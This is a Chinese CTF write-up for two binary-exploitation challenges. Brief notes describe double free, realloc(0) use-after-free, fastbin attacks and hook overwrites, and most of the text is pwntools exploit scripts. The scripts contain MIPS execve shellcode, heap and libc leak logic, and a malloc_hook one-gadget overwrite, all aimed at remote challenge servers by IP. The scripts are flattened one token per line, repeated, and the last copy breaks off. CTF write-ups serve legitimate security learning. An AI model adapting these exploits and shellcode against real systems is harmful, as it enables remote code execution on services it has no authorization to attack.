比赛刚刚结束,把wp放出来
在stack布置fake chunk,然后利用double free劫持stack,覆盖返回地址执行shellcode
编辑功能时,realloc(0)后指针为清空,造成UAF
利用残留指针泄露libc heap地址
然后利用realloc造成uaf 从而构成double free
在chunk中布置fake_chunk利用fastbin atk指过去,从而造成堆块重叠能够任意地址读写
然后修改free_hook为setcontext+53进行ORW
from
PwnContext
import
*
try
:
from
IPython
import
embed as ipy
except
ImportError:
print
(
'IPython not installed.'
)
if
__name__
=
=
'__main__'
:
context.terminal
=
[
'tmux'
,
'splitw'
,
'-h'
]
context.log_level
=
'debug'
context(arch
=
'mips'
, os
=
'linux'
, endian
=
'little'
, word_size
=
32
)
s
=
lambda
data :ctx.send(
str
(data))
sa
=
lambda
delim,data :ctx.sendafter(
str
(delim),
str
(data))
sl
=
lambda
data :ctx.sendline(
str
(data))
sla
=
lambda
delim,data :ctx.sendlineafter(
str
(delim),
str
(data))
r
=
lambda
numb
=
4096
:ctx.recv(numb)
ru
=
lambda
delims, drop
=
True
:ctx.recvuntil(delims, drop)
irt
=
lambda
:ctx.interactive()
rs
=
lambda
*
args,
*
*
kwargs :ctx.start(
*
args,
*
*
kwargs)
dbg
=
lambda
gs
=
'',
*
*
kwargs :ctx.debug(gdbscript
=
gs,
*
*
kwargs)
uu32
=
lambda
data :u32(data.ljust(
4
,
'\0'
))
uu64
=
lambda
data :u64(data.ljust(
8
,
'\0'
))
ctx.remote
=
(
'121.36.166.138'
,
8893
)
def
lg(s,addr):
print
(
'\033[1;31;40m%20s-->0x%x\033[0m'
%
(s,addr))
def
add(idx,content
=
'\n'
):
sla(
'ice\n'
,
1
)
sla(
'\n'
,idx)
sa(
'\n'
,content)
def
delete(idx):
sla(
'ice\n'
,
2
)
sla(
'n'
,idx)
def
edit(content):
sla(
'ice\n'
,
3
)
sa(
'\n'
,content)
rs(
'remote'
)
shellcode
=
'\x69\x6e\x02\x3c\x2f\x62\x42\x34\0\0\xa2\xaf\x68\0\x02\x3c\x2f\x73\x42\x34\x04\0\xa2\xaf\0\0\xa4\x27\xab\x0f\x02\x24\0\0\x05\x24\0\0\x06\x24\x0c\0\0\0'
system
=
0x3fcb4
+
0xf66cd000
bin_sh
=
0x157d6c
+
0xf66cd000
sla(
'o!\n'
,shellcode)
ru(
'0x'
)
stack
=
int
(r(
8
),
16
)
edit(
'e'
*
0x21
)
canary
=
u32(ru(
"\n"
,drop
=
False
)[
-
4
:
-
1
].rjust(
4
,
"\x00"
))
edit(p32(
0
)
*
7
+
p32(
0x41
)
+
p32(canary))
add(
1
,
'\n'
)
add(
2
,
'\n'
)
delete(
1
)
delete(
2
)
delete(
1
)
add(
4
,p32(stack
+
0x20
))
add(
5
,
'\n'
)
add(
6
,
'\n'
)
add(
7
,p32(canary)
+
p32(
0
)
+
p32(stack
+
0x34
)
+
shellcode)
sla(
'ice'
,
4
)
irt()
from
PwnContext
import
*
try
:
from
IPython
import
embed as ipy
except
ImportError:
print
(
'IPython not installed.'
)
if
__name__
=
=
'__main__'
:
context.terminal
=
[
'tmux'
,
'splitw'
,
'-h'
]
context.log_level
=
'debug'
context(arch
=
'mips'
, os
=
'linux'
, endian
=
'little'
, word_size
=
32
)
s
=
lambda
data :ctx.send(
str
(data))
sa
=
lambda
delim,data :ctx.sendafter(
str
(delim),
str
(data))
sl
=
lambda
data :ctx.sendline(
str
(data))
sla
=
lambda
delim,data :ctx.sendlineafter(
str
(delim),
str
(data))
r
=
lambda
numb
=
4096
:ctx.recv(numb)
ru
=
lambda
delims, drop
=
True
:ctx.recvuntil(delims, drop)
irt
=
lambda
:ctx.interactive()
rs
=
lambda
*
args,
*
*
kwargs :ctx.start(
*
args,
*
*
kwargs)
dbg
=
lambda
gs
=
'',
*
*
kwargs :ctx.debug(gdbscript
=
gs,
*
*
kwargs)
uu32
=
lambda
data :u32(data.ljust(
4
,
'\0'
))
uu64
=
lambda
data :u64(data.ljust(
8
,
'\0'
))
ctx.remote
=
(
'121.36.166.138'
,
8893
)
def
lg(s,addr):
print
(
'\033[1;31;40m%20s-->0x%x\033[0m'
%
(s,addr))
def
add(idx,content
=
'\n'
):
sla(
'ice\n'
,
1
)
sla(
'\n'
,idx)
sa(
'\n'
,content)
def
delete(idx):
sla(
'ice\n'
,
2
)
sla(
'n'
,idx)
def
edit(content):
sla(
'ice\n'
,
3
)
sa(
'\n'
,content)
rs(
'remote'
)
shellcode
=
'\x69\x6e\x02\x3c\x2f\x62\x42\x34\0\0\xa2\xaf\x68\0\x02\x3c\x2f\x73\x42\x34\x04\0\xa2\xaf\0\0\xa4\x27\xab\x0f\x02\x24\0\0\x05\x24\0\0\x06\x24\x0c\0\0\0'
system
=
0x3fcb4
+
0xf66cd000
bin_sh
=
0x157d6c
+
0xf66cd000
sla(
'o!\n'
,shellcode)
ru(
'0x'
)
stack
=
int
(r(
8
),
16
)
edit(
'e'
*
0x21
)
canary
=
u32(ru(
"\n"
,drop
=
False
)[
-
4
:
-
1
].rjust(
4
,
"\x00"
))
edit(p32(
0
)
*
7
+
p32(
0x41
)
+
p32(canary))
add(
1
,
'\n'
)
add(
2
,
'\n'
)
delete(
1
)
delete(
2
)
delete(
1
)
add(
4
,p32(stack
+
0x20
))
add(
5
,
'\n'
)
add(
6
,
'\n'
)
add(
7
,p32(canary)
+
p32(
0
)
+
p32(stack
+
0x34
)
+
shellcode)
sla(
'ice'
,
4
)
irt()
from
PwnContext
import
*
try
:
from
IPython
import
embed as ipy
except
ImportError:
print
(
'IPython not installed.'
)
if
__name__
=
=
'__main__'
:
context.terminal
=
[
'tmux'
,
'splitw'
,
'-h'
]
context.log_level
=
'debug'
s
=
lambda
data :ctx.send(
str
(data))
sa
=
lambda
delim,data :ctx.sendafter(
str
(delim),
str
(data))
sl
=
lambda
data :ctx.sendline(
str
(data))
sla
=
lambda
delim,data :ctx.sendlineafter(
str
(delim),
str
(data))
r
=
lambda
numb
=
4096
:ctx.recv(numb)
ru
=
lambda
delims, drop
=
True
:ctx.recvuntil(delims, drop)
irt
=
lambda
:ctx.interactive()
rs
=
lambda
*
args,
*
*
kwargs :ctx.start(
*
args,
*
*
kwargs)
dbg
=
lambda
gs
=
'',
*
*
kwargs :ctx.debug(gdbscript
=
gs,
*
*
kwargs)
uu32
=
lambda
data :u32(data.ljust(
4
,
'\0'
))
uu64
=
lambda
data :u64(data.ljust(
8
,
'\0'
))
ctx.binary
=
'./pwn'
ctx.custom_lib_dir
=
'/home/iddm/glibc-all-in-one/libs/2.29-0ubuntu2_amd64'
ctx.remote
=
(
'119.3.89.93'
,
8015
)
ctx.debug_remote_libc
=
True
ctx.symbols
=
{
'node'
:
0x4040
,
}
ctx.breakpoints
=
[
0x17D6
]
def
lg(s,addr):
print
(
'\033[1;31;40m%20s-->0x%x\033[0m'
%
(s,addr))
def
add(idx,size,content
=
'\n'
):
sla(
'ice'
,
1
)
sla(
'index'
,idx)
sla(
'size'
,size)
sa(
'content'
,content)
def
delete(idx):
sla(
'ice'
,
3
)
sla(
'index'
,idx)
def
show(idx):
sla(
'ice'
,
4
)
sla(
'index'
,idx)
def
edit(idx,size,content
=
'\n'
):
sla(
'ice'
,
2
)
sla(
'index'
,idx)
sla(
'size'
,size)
if
size !
=
0
:
sa(
'content'
,content)
rs(
'remote'
)
add(
0
,
0x10
)
add(
2
,
0x10
)
add(
3
,
0x10
)
delete(
3
)
edit(
0
,
0
)
show(
0
)
heap_base
=
uu64(ru(
'\n'
,drop
=
True
)[
-
6
:])
-
0x2c0
lg(
'heap_base'
,heap_base)
for
i
in
range
(
7
):
add(
10
+
i,
0x10
)
for
i
in
range
(
7
):
delete(
10
+
i)
edit(
2
,
0
)
edit(
2
,
0x10
,p64(heap_base
+
0x250
))
add(
4
,
0x10
)
add(
5
,
0x10
)
sla(
'ice'
,
666
)
ru(
'gift: '
)
libc_base
=
int
(r(
14
),
16
)
-
0x264140
one
=
libc_base
+
0x106ef8
malloc_hook
=
libc_base
+
0x1e4c30
sla(
'string: '
,
'aaa'
)
for
i
in
range
(
8
):
add(
20
+
i,
0x5f
)
for
i
in
range
(
7
):
delete(
20
+
i)
edit(
27
,
0
)
edit(
27
,
0x5f
,p64(malloc_hook
-
0x23
))
dbg()
add(
30
,
0x5f
)
add(
31
,
0x5f
,
'\0'
*
0x13
+
p64(one))
irt()
from
PwnContext
import
*
try
:
from
IPython
import
embed as ipy
except
ImportError:
print
(
'IPython not installed.'
)
if
__name__
=
=
'__main__'
:
context.terminal
=
[
'tmux'
,
'splitw'
,
'-h'
]
context.log_level
=
'debug'
s
=
lambda
data :ctx.send(
str
(data))
sa
=
lambda
delim,data :ctx.sendafter(
str
(delim),
str
(data))
sl
=
lambda
data :ctx.sendline(
str
(data))
sla
=
lambda
delim,data :ctx.sendlineafter(
str
(delim),
str
(data))
r
=
lambda
numb
=
4096
:ctx.recv(numb)
ru
=
lambda
delims, drop
=
True
:ctx.recvuntil(delims, drop)
irt
=
lambda
:ctx.interactive()
rs
=
lambda
*
args,
*
*
kwargs :ctx.start(
*
args,
*
*
kwargs)
dbg
=
lambda
gs
=
'',
*
*
kwargs :ctx.debug(gdbscript
=
gs,
*
*
kwargs)
uu32
=
lambda
data :u32(data.ljust(
4
,
'\0'
))
uu64
=
lambda
data :u64(data.ljust(
8
,
'\0'
))
ctx.binary
=
'./pwn'
ctx.custom_lib_dir
=
'/home/iddm/glibc-all-in-one/libs/2.29-0ubuntu2_amd64'
ctx.remote
=
(
'119.3.89.93'
,
8015
)
ctx.debug_remote_libc
=
True
ctx.symbols
=
{
'node'
:
0x4040
,
}
ctx.breakpoints
=
[
0x17D6
]
def
lg(s,addr):
print
(
'\033[1;31;40m%20s-->0x%x\033[0m'
%
(s,addr))
def
add(idx,size,content
=
'\n'
):
sla(
'ice'
,
1
)
sla(
'index'
,idx)
sla(
'size'
,size)
sa(
'content'
,content)
def
delete(idx):
sla(
'ice'
,
3
)
sla(
'index'
,idx)
def
show(idx):
sla(
'ice'
,
4
)
sla(
'index'
,idx)
def
edit(idx,size,content
=
'\n'
):
sla(
'ice'
,
2
)
sla(
'index'
,idx)
sla(
'size'
,size)
if
size !
=
0
:
sa(
'content'
,content)
rs(
'remote'
)
add(
0
,
0x10
)
add(
2
,
0x10
)
add(
3
,
0x10
)
delete(
3
)
edit(
0
,
0
)
show(
0
)
heap_base
=
uu64(ru(
'\n'
,drop
=
True
)[
-
6
:])
-
0x2c0
lg(
'heap_base'
,heap_base)
for
i
in
range
(
7
):
add(
10
+
i,
0x10
)
for
i
in
range
(
7
):
delete(
10
+
i)
[招生]系统0day安全班,企业级设备固件漏洞挖掘,Linux平台漏洞挖掘!